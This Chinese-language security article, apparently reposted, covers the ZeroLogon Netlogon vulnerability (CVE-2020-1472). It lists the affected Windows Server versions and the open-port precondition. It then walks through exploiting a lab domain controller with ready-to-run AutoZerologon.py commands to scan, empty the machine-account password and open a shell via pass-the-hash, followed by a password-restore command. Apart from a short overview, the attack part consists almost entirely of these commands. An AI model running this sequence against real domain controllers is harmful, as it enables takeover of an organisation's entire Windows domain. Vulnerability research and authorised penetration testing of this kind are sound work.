ZeroLogon:域控权限的“万能钥匙”

admin
admin
admin
0
文章
0
评论
2026-04-28 05:09:24 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: CVE-2020-1472ZeroLogon是Netlogon远程协议中的严重权限提升漏洞,攻击者利用加密算法缺陷可将域控机器账户密码置空获取域控权限。文档详细列出了受影响系统版本、利用前提条件,并展示了通过AutoZerologon工具进行扫描、利用和获取shell的完整过程,最后提供了恢复原始密码哈希的修复方法。 综合评分: 85 文章分类: 漏洞分析,渗透测试,内网渗透,漏洞预警,解决方案

cover_image

ZeroLogon:域控权限的“万能钥匙”

原创

冬夏 冬夏

韭要学JAVA安全

2026年4月27日 13:05 河南

在小说阅读器读本章

去阅读

CVE-2020-1472 ZeroLogon漏洞

📋 漏洞概述

CVE-2020-1472,又称Zerologon,是 Netlogon 远程协议 (MS-NRPC) 中的一个严重权限提升漏洞。攻击者可通过建立 Netlogon 安全通道时使用的加密算法缺陷,将域控机器账户密码置空,从而获取域控权限。

受影响的版本:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)

漏洞利用前提条件:

  • 需要域控开启 135 和 445 端口

✅ 域控 IP:192.168.111.100 ✅ 域名:xxx.com ✅ 域控主机名:xxxxx ✅ 操作系统:Windows Server 2016 (Build 14393)

python3 AutoZerologon.py 192.168.111.100 -scan


python3 AutoZerologon.py 192.168.111.100 -exp


python3 AutoZerologon.py 192.168.111.100 -shell -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218

恢复域控的机器用户哈希

python3 reinstall_original_pw.py 机器名 192.168.111.100 efdb1a7b15dcff465b85432fd59a6293f054fe5bd09bebeea3a8f3f8c7bdc318b951a974be519e672d0e0ffa7fe517a0957808295f6524b377b178889986c0be180473974d8b2aa5ef9587bd784810875f16ca1b9228cf120287854b0cc7c564eef94c1facf0d5beb0bd5a3b7391fab7ca43e74480a2cd47bc340ca8441740b13f0d1a13651d9ea62fb4b8ba152e3782bb4753691e1eafbaff39ff27e0374b3e7e56120949c64b5d5246f1248c94c11ace249d5d972b7c622cba5151e9c615712d98cae95fffc36f00bf905988c284b88c6b7af03c6623b1b8a656b94e83c974385761dde4354e4baad85289f25936ab

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:韭要学JAVA安全 冬夏 冬夏《ZeroLogon:域控权限的“万能钥匙”》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0